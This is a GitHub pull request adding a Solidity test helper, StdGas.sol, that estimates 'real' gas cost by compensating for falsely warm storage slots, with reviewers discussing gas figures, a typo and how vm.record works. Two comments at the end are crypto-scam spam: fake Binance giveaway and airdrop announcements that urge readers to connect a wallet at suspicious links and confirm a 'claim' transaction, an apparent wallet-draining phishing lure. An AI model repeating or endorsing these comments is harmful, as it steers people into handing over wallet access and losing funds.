### PR TITLE
feat: real gas cost metering

### PR DESCRIPTION
**Pull request by MathisGD**
Helper to calculate the "real" gas cost some Solidity code. 

It adds the access cost of cold storage slot to the slots that would have been cold if the sequence was done in a transaction on its own (outside of the test).

TODO:
- [ ] manage any address
- [ ] handle addresses automatically
- [ ] manage cold/warm addresses (CALL opcode)

### CODE REVIEW

File: src/StdGas.sol [hunk 1]
```diff
@@ -0,0 +1,91 @@
...
+        bytes32[] memory slots = _accessedDuringRecording();
+
+        // Compute total gas spent.
+        uint256 gasConsumed = gasLeftAtStart - gasLeft;
+
+        for (uint256 i; i < slots.length; i++) {
+            // If the slot was warm, but shouldn't have been.
+            if (accessed[address(this)][slots[i]]) {
+                // Compensate for false warm slot.
+                gasConsumed += 2100;
```
Comment (QGarchery) [inline src/StdGas.sol:45]: :warning: Storage reads only add 2000 gas when they are cold (2100 is correct for storage writes though)

File: src/StdGas.sol [hunk 2]
```diff
@@ -0,0 +1,91 @@
...
+
+    // Helpers for `_accessedDuringRecording`.
+    mapping(bytes32 => bool) private accessedTemp;
+    bytes32[] private slotsTemp;
+
+    /// @notice Returns all slots accessed during the last recording.
+    /// @dev Concatenates all accesses and removes duplicates (which are not
+    // needed because we don't need to compensate for their warm access).
+    function _accessedDuringRecording() private returns (bytes32[] memory) {
+        // Retrive all accesses (read an write).
```
Comment (QGarchery) [inline src/StdGas.sol:63]:
```suggestion
        // Retrieve all accesses (read an write).
```

File: src/StdGas.sol [hunk 3]
```diff
@@ -0,0 +1,91 @@
...
+
+        for (uint256 i; i < slots.length; i++) {
+            // If the slot was warm, but shouldn't have been.
+            if (accessed[address(this)][slots[i]]) {
+                // Compensate for false warm slot.
+                gasConsumed += 2100;
+            }
+            // Store accessed slot, such that next time it is accessed, the
+            // compensation can be added.
+            accessed[address(this)][slots[i]] = true;
```
Comment (QGarchery) [inline src/StdGas.sol:49]: We can put this into an `else` branch to avoid doing it after the first iteration

File: src/StdGas.sol [hunk 4]
```diff
@@ -0,0 +1,91 @@
...
+    mapping(address => mapping(bytes32 => bool)) private accessed;
+
+    // Gas left when the metering started.
+    uint256 gasLeftAtStart;
+
+    function startGasMetering() internal {
+        // Store gas left before recording.
+        gasLeftAtStart = gasleft();
+        // Clear accesses list.
+        vm.record();
```
Comment (QGarchery) [inline src/StdGas.sol:20]: :warning: I think I don't understand how this works and what is recorded

**Review by QGarchery — CHANGES_REQUESTED** [review]
Nice one :tada: :tada: 

2 things to resolve to be confident in this PR

File: src/StdGas.sol (hunk 1 above)
Comment (MathisGD) [reply src/StdGas.sol:45]: Nice catch

Comment (MathisGD) [reply src/StdGas.sol:45]: Nice catch

File: src/StdGas.sol (hunk 4 above)
Comment (QGarchery) [reply src/StdGas.sol:20]: Seen with @MathisGD: the `vm.accesses` function returns all the accesses (read & write) since the last `vm.record`

**Comment by yinka5521** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Pull request closed without merging**